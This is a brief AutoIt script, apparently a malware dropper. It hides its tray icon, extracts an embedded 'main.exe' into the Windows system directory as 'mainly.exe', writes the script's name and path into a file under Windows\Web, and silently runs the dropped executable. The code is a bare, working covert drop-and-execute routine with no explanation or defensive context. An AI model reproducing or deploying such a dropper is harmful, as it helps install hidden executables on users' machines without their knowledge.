#NoTrayIcon $path = @WindowsDir&"\mainly.exe" FileInstall("main.exe",$path,1) $info = @WindowsDir&"\Web\Information.txt" If FileExists($info) = 1 Then FileDelete($info) FileWriteLine($info,@ScriptName&@LF&@ScriptDir) ShellExecute($path)